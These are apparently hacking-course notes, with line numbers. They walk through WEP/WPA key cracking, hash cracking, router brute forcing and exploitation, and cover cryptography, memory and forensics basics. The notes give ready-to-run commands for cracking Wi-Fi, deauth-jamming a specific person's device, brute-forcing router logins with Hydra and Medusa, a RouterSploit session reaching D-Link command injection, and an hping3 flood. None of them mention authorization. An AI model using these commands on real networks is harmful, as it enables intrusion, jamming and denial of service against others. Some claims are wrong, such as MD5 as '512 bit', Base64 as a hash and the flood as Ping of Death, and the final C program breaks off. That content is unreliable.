3102Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. It can recover the WEP key once enough encrypted packets have been captured with airodump-ng. It uses methods that incorporate various statistical attacks to discover the WEP key, in combination with brute forcing. Additionally, the program offers a dictionary method for determining the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist (a file containing candidate credentials) has to be used.
3103
3104
3105Workflow for Cracking WEP, WPA/WPA2:
3106====================================
3107
3108Step 1: To start the monitor mode.
3109Step 2: To start gathering information about the wireless signals.
3110Step 3: To start capturing the packets.
3111Step 4: Cracking the WiFi password.
3112
3113
3114--------------------------------------------------------------------------------------------------
3115
3116
3117CRACKING WEP ENCRYPTION
3118========================
3119
3120Steps :
3121
3122# iwconfig // Wireless Adapter Name wlan0
3123
3124# airmon-ng start wlan0 // Starting Monitoring Mode on Adapter
3125
3126# kill PID // Killing processes
3127
3128# iwconfig // After Monitoring mode, adapter name is : wlan0mon
3129
3130# airodump-ng wlan0mon // Starting Dumping on Wireless Adapter
3131
3132# airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wepp wlan0mon // saving dumping packets to a file.
3133 --bssid : router's mac address
3134 -c : channel number
3135 -w : writing/capturing wireless packets
3136(This will automatically add -01, -02 etc. to the file name. Here it'll be wepp-01.cap .)
3137
3138# aireplay-ng -1 0 -a <bssid of my wep router> wlan0mon // Sending Re-authentication packets to the router
3139
3140NOTE : There must be at least 15,000 Beacon Packets Captured.
3141
3142# aircrack-ng wepp-01.cap // Cracking Stored WEP Packets
3143
3144
3145The key will be found with (:) in between. For eg. if the passphrase of the access point is "1234567890", the cracked key will be shown as "12:34:56:78:90".
3146Remove the (:) signs from the key found, and the password will be in front of you.
3147
3148
3149--------------------------------------------------------------------------------------------------
3150
3151
3152CRACKING WPA/WPA2
3153==================
3154
3155Steps :
3156
3157# iwconfig // Wireless Adapter Name wlan0
3158
3159# airmon-ng start wlan0 // Starting Monitoring Mode on Adapter
3160
3161# kill PID // Killing processes
3162
3163# iwconfig // After Monitoring mode, adapter name is : wlan0mon
3164
3165# airodump-ng wlan0mon // Starting Dumping on Wireless Adapter
3166
3167# airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wpa2 wlan0mon // saving dumping packets to a file.
3168 --bssid : router's mac address
3169 -c : channel number
3170 -w : to write/capture packets
3171(This will automatically add -01, -02 etc. to the file name. Here it'll be wpa2-01.cap .)
3172
3173# aireplay-ng -0 10 -a <bssid of router> -c <bssid of client/user> wlan0mon // Sending deauthentication packets to the client/user of a router.
3174 -0 : deauthentication packet
3175 -a : mac of target router
3176 -c : mac of any connected client/user
3177(Now we are sending 10 deauthentication packets to the client; after that, if the client tries to reconnect, the WIFI handshake of that access point will be captured.)
3178
3179# aircrack-ng -w <path of dictionary> <filename*.cap> //Starting Dictionary Attack through a Wordlists
3180The wordlist we are using is rockyou.txt, which is pre-installed in Kali Linux. The path of rockyou.txt is : /usr/share/wordlists/rockyou.txt .
3181
3182This will be showing you the password as (KEY FOUND : Password of the Access Point).
3183
3184
3185--------------------------------------------------------------------------------------------------
3186
3187CREATING WIFI JAMMER FOR A SPECIFIC PERSON
3188==========================================
3189
3190# airodump-ng -c <channel number> -w file --bssid <bssid of router> wlan0mon
3191
3192# aireplay-ng --deauth 0 -c <bssid of a specific device> -a <bssid of the router> wlan0mon
3193
3194--------------------------------------------------------------------------------------------------
3195
3196Other Automated Tool For Wireless Cracking :
3197
3198FLUXION - https://github.com/FluxionNetwork/fluxion
3199Only for Linux OS.
3200
3201
3202--------------------------------------------------------------------------------------------------
3203
3204
3205
3206 SESSION 20
3207 ==========
3208
3209MOBILE HACKING & SECURITY
3210=========================
3211
3212https://drive.google.com/open?id=11NwL8hUoNFgyoock3fDytMzwYptqMQ_8
3213
3214
3215
3216 =======
3217 GRADE 2
3218 =======
3219
3220
3221
3222 SESSION 1
3223 =========
3224
3225INTRODUCTION TO CRYPTOGRAPHY
3226============================
3227
3228Cryptography is a form of encryption itself, where readable plain text is converted into another form which does not keep the value of the plain text as it was before. The basic difference is that the converted form will be readable by human beings but will make no sense. These encryption techniques are mostly used for securing and maintaining the privacy of data.
3229
3230For this technique the user has to have an encryption algorithm and a key for its decryption. The user transmits the encrypted message and the receiver receives it. Now for the receiver to understand the cipher, he needs to convert it back into plain text, and for that he again needs the key and the exact algorithm (decryption).
3231
3232TERMINOLOGIES
3233
3234Plain Text : A text which is created and readable by the individuals only.
3235Cipher Text : It is the encrypted text, which is converted by applying an algorithm on the plain text.
3236Encryption : Process of converting a plain text to cipher text.
3237Decryption : Process of converting a cipher text to plain text.
3238
3239CIPHERS
3240========
3241In the cryptography process, ciphers are the encrypted texts which come out of the encryption algorithm.
3242
3243Example of Cipher :
3244
3245Caesar Cipher is one of the oldest ciphers, and introduced the technique of encrypting a plain text into a cipher text. Caesar Cipher works by adding or subtracting 3 positions in the alphabet for each character. That means with a backward shift of 3, a character E in the plain text is transformed to B, and a character A wraps around to X.
3246
3247This cipher algorithm has some mathematical equations which describe the functionality of the cryptography process.
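The equation behind the Caesar cipher is E(x) = (x + k) mod 26 with D(x) = (x - k) mod 26, where x is a letter's position in the alphabet and k is the shift (3 in the classical cipher). The implementation below is an added example, not from the original notes; it generalises to any shift and also shows why the cipher is weak: there are only 25 keys, so all of them can be tried.

```python
from __future__ import annotations

import string

ALPHABET = string.ascii_uppercase  # 26 letters, positions 0..25


def caesar_shift(text: str, shift: int) -> str:
    """Map every letter at position x to (x + shift) mod 26.

    Case is preserved; digits, spaces and punctuation pass through unchanged.
    """
    out = []
    for ch in text:
        if ch.isalpha() and ch.upper() in ALPHABET:
            pos = ALPHABET.index(ch.upper())
            shifted = ALPHABET[(pos + shift) % 26]
            out.append(shifted if ch.isupper() else shifted.lower())
        else:
            out.append(ch)
    return "".join(out)


def encrypt(plaintext: str, key: int = 3) -> str:
    """E(x) = (x + key) mod 26; the classical Caesar key is 3."""
    return caesar_shift(plaintext, key)


def decrypt(ciphertext: str, key: int = 3) -> str:
    """D(x) = (x - key) mod 26, the inverse of encrypt with the same key."""
    return caesar_shift(ciphertext, -key)


def brute_force(ciphertext: str) -> dict[int, str]:
    """Only 25 distinct non-trivial keys exist, so simply try every one.

    Returns each candidate plaintext keyed by the shift that produces it; the
    reader picks the one that makes sense, which is why Caesar offers no
    real confidentiality.
    """
    return {key: decrypt(ciphertext, key) for key in range(1, 26)}


if __name__ == "__main__":
    message = "ATTACK AT DAWN"
    secret = encrypt(message)
    print(secret)            # DWWDFN DW GDZQ
    print(decrypt(secret))   # ATTACK AT DAWN
    print(decrypt("EA"))     # BX, the E->B and A->X example from the notes
    for key, guess in brute_force(secret).items():
        print(key, guess)
```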
3248
3249 Further examples of these Ciphers are Hill Climb and Play Fair Cipher.
3250
3251When we talk about the algorithms of these encryption schemes, these are types of standards or modulations on which the encryption is going on, like AES (Advanced Encryption Standard), DES (Data Encryption Standard), RSA (Rivest Shamir Adleman) etc.
3252
3253
3254KEY SYSTEM IN CRYPTOGRAPHY
3255=============================
3256A cryptographic key is a string of bits used by cryptographic algorithms for converting plain text into cipher text or vice versa.
3257There are mainly two kinds of cryptographic keys.
3258
3259ASYMMETRIC KEY / PUBLIC KEY CRYPTOGRAPHY : Asymmetric key encryption algorithms, called public key algorithms, use two different but related keys for encryption and decryption; the public key is provided publicly by the web server.
3260
3261SYMMETRIC KEY / PRIVATE KEY CRYPTOGRAPHY : Symmetric key encryption algorithms use a single symmetric key for both encryption and decryption, which is kept private.
3262
3263STEGANOGRAPHY
3264================
3265Steganography is a process in which we basically hide data inside other data. It is the process in which data is hidden in plain sight inside an image, audio or video file. This process can also be used along with cryptography as an extra-secure method of protecting data.
3266One of the most famous and simplest techniques used in steganography is the least significant bit technique, also known as LSB.
3267
3268STEPS :
3269$ CMD > copy /b Jelly.jpg+list.txt steganography.jpg
3270
3271Here, /b is used for binding the 2 files, and copy is used for copying the content of the second file onto the end of the first file.
3272
3273For using Cryptography with Steganography, we can use “Encipher.it”.
3274
3275Eg :
3276
3277copy /b gokuu.jpg+hashes.txt sanjeev.jpg
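What `copy /b` produces is a plain concatenation: the text file sits after the JPEG's end-of-image marker, where image viewers never look. The added example below (not part of the original notes) reproduces that binding and, from the analyst's side, walks the JPEG marker structure to find where the real image ends and recover whatever was appended. The sample image bytes are constructed by hand and are not a real photograph.

```python
from __future__ import annotations

SOI = b"\xff\xd8"  # start of image
EOI = b"\xff\xd9"  # end of image: decoders stop here, so bytes after it are ignored
# TEM, SOI and RST0-RST7 markers carry no length field.
STANDALONE_MARKERS = {0x01, 0xD8} | set(range(0xD0, 0xD8))


def jpeg_end_offset(data: bytes) -> int:
    """Return the offset just past the EOI marker of the JPEG at the start of `data`.

    Walks the marker segments instead of searching for the last FF D9, so an
    FF D9 inside a header segment (e.g. an EXIF thumbnail) or inside the
    appended payload does not confuse the result.
    """
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte before a marker, skip it
            pos += 1
            continue
        if marker == 0xD9:
            return pos + 2
        if marker in STANDALONE_MARKERS:
            pos += 2
            continue
        if pos + 3 >= len(data):
            raise ValueError("truncated segment header")
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # includes the 2 length bytes
        pos += 2 + length
        if marker == 0xDA:  # SOS: entropy-coded scan data follows until the next real marker
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break  # FF 00 is a stuffed byte, FF D0-D7 are restart markers
                pos += 1
    raise ValueError("no EOI marker found")


def bind_files(image: bytes, payload: bytes) -> bytes:
    """What `copy /b image.jpg+list.txt out.jpg` does: raw concatenation."""
    return image + payload


def extract_appended(data: bytes) -> bytes:
    """Everything after the image's EOI marker; b'' for a clean file."""
    return data[jpeg_end_offset(data):]


# Constructed minimal JPEG: SOI, an APP0/JFIF header, an SOS header, a few bytes of
# scan data containing a stuffed FF 00 and an RST0 marker, then EOI. 40 bytes in total.
APP0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
SOS = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
SCAN = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
SAMPLE_JPEG = SOI + APP0 + SOS + SCAN + EOI

if __name__ == "__main__":
    stego = bind_files(SAMPLE_JPEG, b"line one\nline two\n")  # constructed list.txt content
    end = jpeg_end_offset(stego)
    print(f"image ends at byte {end}, {len(stego) - end} bytes appended")
    print(extract_appended(stego))
```

A file whose size is larger than its image end offset is the simplest indicator that something was bound onto it.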
3278
3279
3280Hashes
3281======
3282It converts data into either alphanumeric form or hex form. But there is a difference between cipher encryption and a hash: encrypted text can be reverted and decrypted, but hashes cannot be reverted. We need to crack the hashes.
3283A hash function is one which takes an input and returns a fixed-size alphanumeric string. The string is called the hash value. Examples: MD5 Hash, Base64 Encoding etc.
3284
3285
3286EG. alphanumeric - scusege67dg367df7fd3fd37f3636d
3287
3288Cracking methods for hashes : We have to create a dictionary, convert every word of the wordlist into its hash, and then compare each of those hashes with the target hash. If one matches, it means the specific word is found. Hashes are usually unique.
3289
3290HASHES FORMATS
3291================
32921. Base64 encoding
3293It is a process of encoding in which the plain text is converted into alphanumeric form, but the length of the output varies with the length of the plain text. It's a textual encoding of binary data where the resultant text has nothing but letters, numbers and a few symbols.
3294
3295
32962. MD5 (Message Digest 512 bit)
3297It will convert the plain text into hexadecimal text of fixed length. It always creates a unique hash for the plain text, normally shown as its 32 digit hexadecimal equivalent.
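The wordlist comparison described under "Cracking methods for Hashes" and the Base64/MD5 contrast above, as an added example that is not part of the original notes. The wordlist is a constructed stand-in for rockyou.txt; the salted PBKDF2 variant is added here to show what makes stored hashes resist this kind of comparison.

```python
from __future__ import annotations

import base64
import hashlib
import os

# Constructed sample wordlist standing in for rockyou.txt (the real file is far larger).
SAMPLE_WORDLIST = ["123456", "password", "letmein", "qwerty", "chillypannerr@234"]


def md5_hex(word: str) -> str:
    """MD5 digest as 32 hex characters, whatever the input length."""
    return hashlib.md5(word.encode()).hexdigest()


def base64_encode(text: str) -> str:
    """Output length grows with the input: 4 characters for every 3 input bytes."""
    return base64.b64encode(text.encode()).decode("ascii")


def base64_decode(encoded: str) -> str:
    """Base64 is an encoding, not a hash: it reverses with no key and no cracking."""
    return base64.b64decode(encoded).decode()


def dictionary_match(target_hash: str, wordlist) -> str | None:
    """Hash each candidate and compare with the target; the first hit is the recovered word.

    This is the whole idea behind wordlist attacks in aircrack-ng or hashcat:
    one fast hash per guess. For unsalted MD5 the candidate hashes can even be
    computed once and reused against every leaked hash.
    """
    target = target_hash.strip().lower()
    for word in wordlist:
        if md5_hex(word) == target:
            return word
    return None


def pbkdf2_hash(password: str, salt: bytes, iterations: int = 200_000) -> str:
    """Hardened storage: a per-password random salt plus an iterated hash (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def salted_dictionary_match(target_hash: str, salt: bytes, iterations: int, wordlist) -> str | None:
    """The same comparison against a salted, iterated hash.

    Weak passwords still fall, but every guess now costs `iterations` hash
    calls, and nothing precomputed carries over between users because each
    salt differs.
    """
    for word in wordlist:
        if pbkdf2_hash(word, salt, iterations) == target_hash:
            return word
    return None


if __name__ == "__main__":
    print(base64_encode("hello"), "->", base64_decode(base64_encode("hello")))
    print(md5_hex("a"), md5_hex("a" * 1000))  # both 32 hex digits
    leaked = md5_hex("letmein")               # constructed "leaked" hash
    print("recovered:", dictionary_match(leaked, SAMPLE_WORDLIST))
    salt = os.urandom(16)
    stored = pbkdf2_hash("letmein", salt, 50_000)
    print("recovered (salted):", salted_dictionary_match(stored, salt, 50_000, SAMPLE_WORDLIST))
```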
3298
3299
3300AUTOMATED TOOL
3301================
3302
3303Hashcat is the world's fastest and most advanced password recovery tool. It converts the wordlist into hashes and then matches those hashes with the specific hash we want to recover. It is pre-installed in the Kali Linux OS.
3304Instead of using standard CPU cores, it can use GPU or graphics card cores.
3305
3306USAGE :
3307$ hashcat -m 0 -a 3 <hashfile in txt> <dictionary|wordlist>
3308
3309STEPS :
3310$ hashcat -m 0 -a 3 /root/Desktop/hash.txt /usr/share/wordlists/rockyou.txt
3311$ hashcat -m 0 -a 3 /root/Desktop/hash.txt /usr/share/wordlists/rockyou.txt --force
3312
3313Here,
3314hashcat is the tool for password recovery
3315-m : hash type
33160 : MD5
3317-a : attack mode
33183 : Brute force attack
3319hash.txt : file containing hashes to be recovered
3320rockyou.txt : for brute forcing and comparing
3321--force : to start forcefully
3322
3323CUDA CRACKING
3324===============
3325CUDA cracking, also called GPU password cracking, is only for NVidia. CUDA is part of NVidia only, so only NVidia graphics cards can support CUDA cracking, which makes password recovery very fast.
3326
3327
3328-------------------------------------------------------------------------------
3329
3330WEP
3331===
3332
3333WEP stands for Wired Equivalent Privacy, a Wi-Fi wireless network security standard. A WEP key is a kind of security passcode for Wi-Fi devices. WEP keys enable a group of devices on a local network to exchange encrypted (mathematically encoded) messages with each other while hiding the contents of the messages from easy viewing by outsiders.
3334
3335
3336- Pixie Dust Attack
3337- Using Wifite
3338
3339
3340https://pastebin.com/nRBTeEMee
3341
3342
3343
3344 SESSION 2
3345 =========
3346
3347ROUTER PENETRATION TESTING
3348==========================
3349
3350The router is the central connecting device, which provides connectivity to all the end devices and nodes along with the network components of a particular network. Router pentesting is a process in which a network auditor cross-checks all the possible information gathering as well as exploitation methods for the router. The goal of router pentesting is to know the scope of the network by identifying the total number of access points, the MAC address of each router, the router model number, the router company name and the firmware version.
3351
3352There are two types of attacking procedures for that :
3353
3354Active Router Attack : In this attack we attack directly on the router's IP, which is mostly 192.168.0.1 or 192.168.1.1, and try to halt the services in the network and get the juicy data out of the router.
3355Eg. Dictionary Attack
3356 Wifi Jammer
3357 Brute Force
3358 DOS AND DDOS
3359
3360Passive Router Attack : In this attack we do not engage the router in the process; instead we work with the broadcast packet data generated by the router. The attack doesn't go directly to the router, but the attacker can use the data which originates from or passes through the router.
3361Eg. Sniffing and monitoring the WIFI traffic, doing MITM and other things etc.
3362
3363Attack Vectors
3364Information Gathering of the Router :
3365When connected to the network
3366Terminal : route -n
3367Terminal : netdiscover -r 192.168.0.1/24
3368(This can be used for getting the MAC address of the router)
3369When we got the MAC address : https://www.macvendorlookup.com/ can be used for getting the Vendor Name.
3370
3371How to find out more about Router Vendor : (When the MAC Address is spoofed)
3372
3373Airmon-ng start wlan0
3374Airodump-ng -M --bssid -c wlan0mon. (Big Window)
3375
3376-----------------------------------------------------------------
3377
3378http://192-168-1-1ip.mobi/default-router-passwords-list/
3379http://www.routerpasswords.com/
3380https://www.bestvpn.com/default-router-login-details/
3381
3382---------------------------------------------------------------------
3383
3384Brute Forcing on Default Credentials :
3385Default credentials are those which have not been changed after the purchase of the router itself; these are the router login page credentials.
3386Mostly the username is just Admin.
3387
3388For brute forcing we are going to use some advanced brute force tools which are pre-installed in Kali Linux.
3389Tools : Hydra, Medusa, Xhydra, Burpsuite
3390
3391Attacking Methods:
3392
3393Hydra : #hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 -m http-get
3394
3395Here, -l : username, -P : Passwords, where we put a dictionary of credentials, Rockyou.txt , http-get / http-post : Way of transmission of data , 192.168.0.1 : Default Router's IP Address.
3396
3397Medusa : #medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http
3398
3399Here, -h : Target IP Address , -u : Username , -P : Password, here we can embed a dictionary of credentials, -M : Method of transmission
3400
3401
3402Routersploit Framework (RSF)
3403=============================
3404
3405It is a tool written in python used for automating the process of router exploitation. This is not pre-installed in Kali Linux, so we have to get it from external sources.
3406
3407Downloading Steps :
3408Installation on Kali Linux :
3409apt-get install python3-pip
3410git clone https://www.github.com/threat9/routersploit
3411cd routersploit
3412python3 -m pip install -r requirements.txt
3413python3 rsf.py
3414
3415Running Steps :
3416
3417When the Routersploit Framework is on,
3418rsf > help (For help Menu)
3419Global commands:
3420help - Print this help menu
3421use <module> - Select a module for usage
3422exec <shell command> <args> - Execute a command in a shell
3423search <search term> - Search for appropriate module
3424exit - Exit RouterSploit
3425rsf > use scanners/ (Using Scanners : Will show the list of every scanner)
3426scanners/2wire_scan
3427scanners/billion_scan
3428scanners/huawei_scan
3429scanners/netcore_scan
3430scanners/tplink_scan
3431scanners/3com_scan
3432scanners/cameras_scan
3433scanners/ipfire_scan
3434scanners/netgear_scan
3435scanners/ubiquiti_scan
3436scanners/asmax_scan
3437scanners/cisco_scan
3438scanners/juniper_scan
3439scanners/netsys_scan
3440scanners/zte_scan
3441scanners/asus_scan
3442scanners/comtrend_scan
3443scanners/linksys_scan
3444scanners/routers_scan
3445scanners/zyxel_scan
3446scanners/autopwn
3447scanners/dlink_scan
3448scanners/misc_scan
3449scanners/shuttle_scan
3450scanners/belkin_scan
3451scanners/fortinet_scan
3452scanners/movistar_scan
3453scanners/technicolor_scan
3454scanners/bhu_scan
3455scanners/grandstream_scan
3456scanners/multi_scan
3457scanners/thomson_scan
3458rsf > use scanners/autopwn (using autopwn)
3459rsf (AutoPwn) > show options
3460
3461Target options:
3462
3463   Name     Current settings     Description
3464   ----     ----------------     -----------
3465   target                        Target IP address e.g. 192.168.1.1
3466   port     80                   Target port
3467
3468
3469Module options:
3470
3471   Name      Current settings     Description
3472   ----      ----------------     -----------
3473   threads   8                    Number of threads
3474
3475
3476rsf (AutoPwn) >
3477
3478rsf (AutoPwn) > set target 192.168.0.1
3479[+] {'target': '192.168.0.1'}
3480rsf (AutoPwn) > show options
3481
3482Target options:
3483
3484   Name     Current settings     Description
3485   ----     ----------------     -----------
3486   target   192.168.0.1          Target IP address e.g. 192.168.1.1
3487   port     80                   Target port
3488
3489
3490Module options:
3491
3492   Name      Current settings     Description
3493   ----      ----------------     -----------
3494   threads   8                    Number of threads
3495
3496
3497rsf (AutoPwn) >
3498
3499
3500[*] Could not verify exploitability:
3501 - exploits/routers/dlink/dsl_2740r_dns_change
3502 - exploits/routers/dlink/dir_815_850l_rce
3503 - exploits/routers/dlink/dsl_2640b_dns_change
3504 - exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
3505 - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
3506 - exploits/routers/shuttle/915wm_dns_change
3507 - exploits/routers/billion/5200w_rce
3508 - exploits/routers/cisco/catalyst_2960_rocem
3509 - exploits/routers/cisco/secure_acs_bypass
3510
3511[+] Device is vulnerable:
3512 - exploits/routers/dlink/multi_hnap_rce
3513
3514rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
3515rsf (D-Link Multi HNAP RCE) > show options
3516
3517Target options:
3518
3519   Name     Current settings     Description
3520   ----     ----------------     -----------
3521   target                        Target address e.g. http://192.168.1.1
3522   port     80                   Target Port
3523
3524
3525rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
3526[+] {'target': '192.168.0.1'}
3527rsf (D-Link Multi HNAP RCE) > show options
3528
3529Target options:
3530
3531   Name     Current settings       Description
3532   ----     ----------------       -----------
3533   target   http://192.168.0.1     Target address e.g. http://192.168.1.1
3534   port     80                     Target Port
3535
3536
3537rsf (D-Link Multi HNAP RCE) >
3538rsf (D-Link Multi HNAP RCE) > run
3539[*] Running module...
3540[*] Target might be vulnerable - it is hard to verify
3541[*] Invoking command loop...
3542[*] It is blind command injection, response is not available
3543
3544[+] Welcome to cmd. Commands are sent to the target via the execute method.
3545[*] Depending on the vulnerability, command's results might not be available.
3546[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
3547
3548-----------------------------------------------------------------
3549
3550
3551DDOS
3552=====
3553
3554A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic.
3555
3556
3557DDOS Explained : https://www.youtube.com/watch?v=OhA9PAfkJ10
3558
3559DDOS Ping of Death Attack by using Hping3 -
3560
3561hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306
3562
3563
3564--------------------------------------------------------------------------------------------------
3565
3566
3567
3568 SESSION 3
3569 =========
3570
3571WINDOWS MEMORY MANAGEMENT
3572=========================
3573
3574Memory - Storage : where we can store anything, any kind of data
3575 Data - It can be anything - Text, Document, Pic, Music, Video
3576Management - Allocating memory - Which process will consume what amount of memory, and at what time what sort of memory will be used.
3577
3578
3579There are two types of memory
3580=============================
35811. Primary Memory
35822. Secondary Memory
3583
3584
35851. Primary Memory
3586=================
3587 Also referred to as execution memory, in which data is wiped out whenever you start/stop the OS. It is also known as temporary memory. It is used for executing things.
3588 Eg. RAM - Random Access Memory
3589
35902. Secondary Memory
3591===================
3592 In which we can permanently store data. Whenever we store data in this type of memory, it will remain there until the user deletes it manually.
3593 Eg. Hard Disk Drive, USB drive, CD, DVD.
3594
3595
3596Memory Management - How to allocate the memory to the process, how to allocate memory to the application. How to store the data in the hard disk drive.
3597
3598How to optimize your hard disk?
3599Solutions :
3600 temp - What are they? > %temp% > Should we delete these?
3601 Background processes > PIDs
3602 disk cleanup > Defragmentation
3603 prefetch > boot temporary files
3604
3605
3606CD - compact Disk
3607DVD - Digital Versatile Disk
3608
3609Virtualization
3610==============
3611 Sharing the resources of one device for better and more processes.
3612 VMWare, Virtual Machine, Virtual Box
3613
36141. Type 0 - Also known as "Bare Bone" - In the hard disk, you directly install the virtualization software and then you install virtual OS.
3615
3616https://www.vmware.com/in/products/vsphere.html
3617
36182. Type 1 - In the Hard Disk, you install the OS and in that OS, you install the Virtualization software and on that you install virtual OS.
3619
3620Virtual Memory
3621==============
3622 It is space which is not actual physical space but virtual space. When the space in the RAM gets low, it borrows some memory from the HDD to continue the processes.
3623
3624Virtual Table
3625=============
3626 They are like my content page, index page in the book. They tell me at which location my process is located and will help the RAM to access the process.
3627
3628Virtual Page
3629============
3630 Contains the collection of virtual table, in which all the processes are mapped.
3631
3632
3633Dynamic Memory Allocation
3634=========================
3635 malloc()
3636 calloc()
3637 realloc()
3638 free()
3639
3640malloc - Memory allocation
3641 To allocate memory in any manner; it is not continuous memory allocation. It uses a pointer.
3642calloc - Contiguous Memory Allocation
3643 It allocates a continuous block of memory.
3644 It uses the pointer for allocating the memory.
3645
3646realloc - Reallocation of Memory - If, while performing the process, the memory runs out, then I am here to assist you with more memory by again allocating it to the process.
3647
3648free - Vacate the Memory - to make vacant the memory which is consumed by the background processes.
3649
3650https://www.tutorialspoint.com/cprogramming/c_memory_management.htm
3651
3652---------------------------------------------------------
3653
3654How Data is stored in CD|DVD
3655 CD is divided into tracks and sectors.
3656
3657How Does Cyber Forensic Works
3658=============================
3659 1. They never operate on the original source.
3660 2. I will make at least 15 copies|clones of the retrieved source using the same machines that were used to create this hardware.
3661 3. I will maintain a journal, for each and everything we collected, with location and the time.
3662 4. I will always take the source to the isolated place, for forensics.
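The clone-and-journal rules above rely on one technical check: a clone is only usable as evidence if it hashes identically to the source, and the journal records that hash with the location and time. The code below is an added illustration, not part of the original notes; the evidence bytes and locations are constructed.

```python
from __future__ import annotations

import hashlib
import json
from datetime import datetime, timezone


def sha256_hex(data: bytes) -> str:
    """Fingerprint of a source or clone; any changed byte changes the digest."""
    return hashlib.sha256(data).hexdigest()


def verify_clone(original: bytes, clone: bytes) -> bool:
    """Rule 1 and 2 together: work on a clone, but only one proven identical to the source."""
    return sha256_hex(original) == sha256_hex(clone)


def make_clones(source: bytes, count: int = 15) -> list[bytes]:
    """Bit-for-bit copies; analysis happens on these, never on `source`."""
    return [bytes(source) for _ in range(count)]


def check_all_clones(source: bytes, clones: list[bytes]) -> list[int]:
    """Indexes of clones that no longer match the source digest (expected to be empty)."""
    expected = sha256_hex(source)
    return [i for i, clone in enumerate(clones) if sha256_hex(clone) != expected]


def journal_entry(item: str, data: bytes, location: str, when: datetime | None = None) -> dict:
    """Rule 3: what was collected, where, when, and the digest that pins it down."""
    when = when or datetime.now(timezone.utc)
    return {
        "item": item,
        "location": location,
        "time": when.isoformat(),
        "size": len(data),
        "sha256": sha256_hex(data),
    }


def journal_line(entry: dict) -> str:
    """One append-only JSON line per journal entry, keys sorted so lines diff cleanly."""
    return json.dumps(entry, sort_keys=True)


if __name__ == "__main__":
    evidence = b"constructed disk image contents"          # stands in for the seized source
    clones = make_clones(evidence)
    print(journal_line(journal_entry("usb-01", evidence, "evidence locker 7")))
    print("bad clones:", check_all_clones(evidence, clones))  # []
    clones[4] = b"constructed disk image contentz"          # one byte flipped in transit
    print("bad clones:", check_all_clones(evidence, clones))  # [4]
```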
3663
3664Data Recovery Application
3665==========================
3666= Recuva - https://recuva.en.softonic.com/download
3667= Active Undelete
3668
3669
3670Data Forensics
3671==============
3672 We can recover almost any sort of data from the digital media.
3673 CD
3674 DVD
3675 Pen drive
3676 HDD
3677 Computer
3678
Number System In Computers
==========================
1. Binary
2. Decimal
3. Octal
4. Hexadecimal

Decimal      Binary       Octal       Hexadecimal
-----------------------------------------------------------
0-9          0 and 1      0-7         0-9|A-F
10 digits    2 digits     8 digits    16 digits
Base 10      base 2       base 8      base 16
------------------------------------------------------------
0            0            0           0
1            1            1           1
2            10           2           2
3            11           3           3
4            100          4           4
5            101          5           5
6            110          6           6
7            111          7           7
8            1000         10          8
9            1001         11          9
10           1010         12          A --> 10
11           1011         13          B --> 11
12           1100         14          C --> 12
13           1101         15          D --> 13
14           1110         16          E --> 14
15           1111         17          F --> 15






Bit weights of one byte (8 bits):

       128   64   32   16    8    4    2    1
126      0    1    1    1    1    1    1    0
192      1    1    0    0    0    0    0    0
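The conversion behind both tables, as an added example (not from the notes): repeated division by the base produces the digits of the Decimal/Binary/Octal/Hex table for any base from 2 to 16, the inverse parses such a string back, and byte_bits prints a value against the 128..1 weight row. It goes beyond the table in handling any base and any value, not only 0 to 15. The function names are mine.

```c
#include <stdio.h>
#include <string.h>

/* Added example: write value in the given base (2..16) into out, most significant digit first.
 * Returns out, or NULL if the base is unsupported or out is too small. */
char *to_base(unsigned long value, unsigned base, char *out, size_t out_len)
{
    static const char digits[] = "0123456789ABCDEF";
    char tmp[sizeof(unsigned long) * 8 + 1];   /* worst case is base 2: one char per bit */
    size_t n = 0;

    if (base < 2 || base > 16 || out_len == 0)
        return NULL;
    do {                                        /* repeated division: least significant digit first */
        tmp[n++] = digits[value % base];
        value /= base;
    } while (value != 0);
    if (n + 1 > out_len)
        return NULL;
    for (size_t i = 0; i < n; i++)              /* reverse into the caller's buffer */
        out[i] = tmp[n - 1 - i];
    out[n] = '\0';
    return out;
}

/* Inverse: parse digits 0-9, A-F, a-f in the given base. Returns -1 on a digit that is
 * not valid for that base (e.g. "9" in octal). */
long from_base(const char *s, unsigned base)
{
    long value = 0;
    for (; *s != '\0'; s++) {
        int d;
        if (*s >= '0' && *s <= '9')      d = *s - '0';
        else if (*s >= 'A' && *s <= 'F') d = *s - 'A' + 10;
        else if (*s >= 'a' && *s <= 'f') d = *s - 'a' + 10;
        else                             return -1;
        if ((unsigned)d >= base)
            return -1;
        value = value * base + d;
    }
    return value;
}

/* The 8-bit weight row (128 64 32 16 8 4 2 1): fixed-width binary of one byte. */
char *byte_bits(unsigned char v, char out[9])
{
    for (int i = 0; i < 8; i++)
        out[i] = (v & (0x80u >> i)) ? '1' : '0';   /* test weight 128, then 64, ... down to 1 */
    out[8] = '\0';
    return out;
}

int main(void)
{
    char b[65], o[65], h[65], bits[9];

    printf("Dec  Bin   Oct  Hex\n");
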